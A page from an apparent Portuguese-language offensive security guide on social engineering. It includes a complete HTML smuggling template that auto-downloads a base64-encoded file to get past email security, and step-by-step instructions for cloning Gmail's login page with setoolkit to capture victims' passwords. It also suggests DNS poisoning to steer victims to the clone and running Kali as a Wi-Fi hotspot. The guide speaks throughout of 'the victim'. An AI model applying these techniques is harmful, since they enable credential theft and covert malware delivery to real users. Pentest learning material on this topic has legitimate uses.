Engenharia Social

Engenharia social é termo utilizado para descrever um método de ataque, onde alguém faz uso da persuasão, muitas vezes abusando da ingenuidade ou confiança do usuário, para obter informações que podem ser utilizadas para ter acesso não autorizado a computadores ou informações.

Download Automático

Maneira 1 - Smuggling HTML

Monta o código HTML para baixar o arquivo em tempo real no navegador do usuário, então isso faz um bypass nos mecanismos de segurança dos e-mails

<html>
    <head>
        <title>HTML Smuggling</title>
    </head>
    <body>
        <p>This is all the user will see...</p>

        <script>
        function convertFromBase64(base64) {
            var binary_string = window.atob(base64);
            var len = binary_string.length;
            var bytes = new Uint8Array( len );
            for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
            return bytes.buffer;
        }

        var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
        var data = convertFromBase64(file);
        var blob = new Blob([data], {type: 'octet/stream'});
        var fileName = 'test.txt';

        if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
        else {
            var a = document.createElement('a');
            document.body.appendChild(a);
            a.style = 'display: none';
            var url = window.URL.createObjectURL(blob);
            a.href = url;
            a.download = fileName;
            a.click();
            window.URL.revokeObjectURL(url);
        }
        </script>
    </body>
</html>

Maneira 2

Um ótimo jeito quando se tem acesso ao código, é fazer o usuário baixar algo automaticamente e, para isso pode utilizar um dos seguintes métodos:

Obviamente, o usuário precisará aceitar o download do arquivo, mas muitas pessoas deixam marcado a caixa de download automático

Setoolkit

Clonar Sites Para Capturar Senhas

Abra o terminal e digite setoolkit e vá na opção 5, depois 6 (SET Configuration)

ROUBANDO SENHAS DO GMAIL

Depois disso basta fazer com que a vítima acesse seu IP no navegador, e irá abrir á página do Google pedindo usuário e senha. Assim que a vítima digitar o usuário e senha, irá ser gravado um LOG com as informações em: /var/www/html/harvester_date.txt

OBS.: Até então está tudo ok, porém nenhuma vítima vai querer colocar o IP do Kali no navegador para acessar o Google. Então utilize o Ettercap para realizar o envenenamento de DNS (Vide na sessão de MITM).

Usando Kali Linux como Access Point

Antes de começar vá no terminal e execute o seguinte comando para depois configurar o Hostspot: nmtui Ou se preferir, pode alterar tudo manualmente, alterando o arquivo: /etc/NetworkManager/system-connections/Hotspot

Agora vá nas configurações de rede, do lado esquerdo em "Wi-fi (wlan0), e clique em Use as Hotspot e depois em Turn on

OBS.: Para voltar a placa de rede ao normal, ainda no Setoolkit utilize a opção 2 (Stop the SET...), nas configurações de rede, desabilite o Hotspot e depois desabilite a placa de rede e ative novamente

Sites

PreviousEvidenciando o AtaqueNextPhishing

Last updated

Was this helpful?